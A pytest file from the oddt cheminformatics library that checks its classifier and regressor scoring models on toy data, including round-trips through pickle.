return tuple([list_index(d, valid_idxs) for d in data])
|
tests/test_models.py | lmacaya/oddt | 264 | 32954 | import pickle
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
import pytest
from oddt.scoring.models import classifiers, regressors
@pytest.mark.filterwarnings('ignore:Stochastic Optimizer')
@pytest.mark.parametrize('cls',
[classifiers.svm(probability=True),
classifiers.neuralnetwork(random_state=42)])
def test_classifiers(cls):
# toy data
X = np.concatenate((np.zeros((5, 2)), np.ones((5, 2))))
Y = np.concatenate((np.ones(5), np.zeros(5)))
np.random.seed(42)
cls.fit(X, Y)
assert_array_equal(cls.predict(X), Y)
assert cls.score(X, Y) == 1.0
prob = cls.predict_proba(X)
assert_array_almost_equal(prob, [[0, 1]] * 5 + [[1, 0]] * 5, decimal=1)
log_prob = cls.predict_log_proba(X)
assert_array_almost_equal(np.log(prob), log_prob)
pickled = pickle.dumps(cls)
reloaded = pickle.loads(pickled)
prob_reloaded = reloaded.predict_proba(X)
assert_array_almost_equal(prob, prob_reloaded)
@pytest.mark.parametrize('reg',
[regressors.svm(C=10),
regressors.randomforest(random_state=42),
regressors.neuralnetwork(solver='lbfgs',
random_state=42,
hidden_layer_sizes=(20, 20)),
regressors.mlr()])
def test_regressors(reg):
X = np.vstack((np.arange(30, 10, -2, dtype='float64'),
np.arange(100, 90, -1, dtype='float64'))).T
Y = np.arange(10, dtype='float64')
np.random.seed(42)
reg.fit(X, Y)
pred = reg.predict(X)
assert (np.abs(pred.flatten() - Y) < 1).all()
assert reg.score(X, Y) > 0.9
pickled = pickle.dumps(reg)
reloaded = pickle.loads(pickled)
pred_reloaded = reloaded.predict(X)
assert_array_almost_equal(pred, pred_reloaded)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.